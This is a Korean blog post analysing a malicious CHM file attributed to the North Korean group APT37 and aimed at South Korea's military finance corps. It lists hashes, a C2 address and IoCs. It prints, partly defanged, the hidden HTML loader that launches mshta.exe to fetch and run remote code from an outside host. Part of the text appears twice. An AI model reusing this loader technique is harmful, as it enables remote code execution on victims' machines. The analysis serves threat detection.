북한 해킹 단체 APT37 에서 만든 악성코드-국군재정관리단.chm(2023.11.21)
Contents
오늘은 북한 해킹 단체 APT37 에서 만든 악성코드인 국군재정관리단.chm(2023.11.21)에 대해 글을 적어보겠습니다.
APT37은 북한의 해킹조직 중 하나로 레드아이즈(Red Eyes), 금성 121(Group123),리퍼(Reaper) 등으로 불리고 있은 북한 해킹 단체 이면 해당 국군재정관리단.chm(2023.11.21)은 국군재정관리단(國軍財政管理團,MND Financial Management Corps)에서 근무를 하고 있는 분들을 대상으로 하는 악성코드인 것 같습니다. 국군재정관리단은
대한민국 국군의 부대로 국군의 재정을 관리하는 부대이며 국방부 직할 부대이며 주로 처리하는 업무는 50만 군인들의 급여와 직업군인 대상의 군인연금 지급 곳이며 그 외에 국방부에서 맡는 계약업무 등도 처리하는 곳입니다. 아마도 돈 하고 관련이 되지 않았을까 하는 생각을 아는 악성코드입니다.
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:국군재정관리단.chm
사이즈:63.8 KB
MD5:a372e8dfd1940ef4f9e74095a8bf3bd7
SHA-1:e73d679ca6314946072c41dcbbf59dc628234442
SHA-256:3d2738ff73af2bc88cb9c396b31f6991177cd869f9ca7ab44203f3721b98f8c2
이며 해당 악성코드를 실행하면 특정 주소로 연결하게 구성이 돼 있으며 HTTP Debugger Pro를 보거나 해당 악성코드의 Start(.)html 웹소스를 보면 해당 악성코드가 접속을 시도하는 주소를 확인할 수가 있습니다.
최종적으로 접속하는 주소
http://attiferstudio(.)com/install(.)bak/sony/8(.)html
입니다.
해당 HTML 파일에 숨겨져 있는 코드는 다음과 같습니다.
<HTML> <TITLE> 국군재정관리단 </TITLE> <HEAD> </HEAD> <BODY> <H1 align=center> 국군재정관리단 </h1> <br> <OBJECT id=x classid="clsid:adb880a6(-)d8ff(-)11cf(-)9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap:(:)shortcut"> <PARAM name="Item1" value=",mshta(.)exe,http://attiferstudio(.)com/ install(.)bak/sony/8(.)html ,"> <PARAM name="Item2" …
APT37은 북한의 해킹조직 중 하나로 레드아이즈(Red Eyes), 금성 121(Group123),리퍼(Reaper) 등으로 불리고 있은 북한 해킹 단체 이면 해당 국군재정관리단.chm(2023.11.21)은 국군재정관리단(國軍財政管理團,MND Financial Management Corps)에서 근무를 하고 있는 분들을 대상으로 하는 악성코드인 것 같습니다. 국군재정관리단은
대한민국 국군의 부대로 국군의 재정을 관리하는 부대이며 국방부 직할 부대이며 주로 처리하는 업무는 50만 군인들의 급여와 직업군인 대상의 군인연금 지급 곳이며 그 외에 국방부에서 맡는 계약업무 등도 처리하는 곳입니다. 아마도 돈 하고 관련이 되지 않았을까 하는 생각을 아는 악성코드입니다.
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:국군재정관리단.chm
사이즈:63.8 KB
MD5:a372e8dfd1940ef4f9e74095a8bf3bd7
SHA-1:e73d679ca6314946072c41dcbbf59dc628234442
SHA-256:3d2738ff73af2bc88cb9c396b31f6991177cd869f9ca7ab44203f3721b98f8c2
이며 해당 악성코드를 실행하면 특정 주소로 연결하게 구성이 돼 있으며 HTTP Debugger Pro를 보거나 해당 악성코드의 Start(.)html 웹소스를 보면 해당 악성코드가 접속을 시도하는 주소를 확인할 수가 있습니다.
최종적으로 접속하는 주소
http://attiferstudio(.)com/install(.)bak/sony/8(.)html
입니다.
해당 HTML 파일에 숨겨져 있는 코드는 다음과 같습니다.
<HTML> <TITLE> 국군재정관리단 </TITLE> <HEAD> </HEAD> <BODY> <H1 align=center> 국군재정관리단 </h1> <br> <OBJECT id=x classid="clsid:adb880a6(-)d8ff(-)11cf(-)9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap:(:)shortcut"> <PARAM name="Item1" value=",mshta(.)exe,http://attiferstudio(.)com/ install(.)bak/sony/8(.)html ,"> <PARAM name="Item2" …
IoC
3d2738ff73af2bc88cb9c396b31f6991177cd869f9ca7ab44203f3721b98f8c2
a372e8dfd1940ef4f9e74095a8bf3bd7
e73d679ca6314946072c41dcbbf59dc628234442
http://attiferstudio.com/
a372e8dfd1940ef4f9e74095a8bf3bd7
e73d679ca6314946072c41dcbbf59dc628234442
http://attiferstudio.com/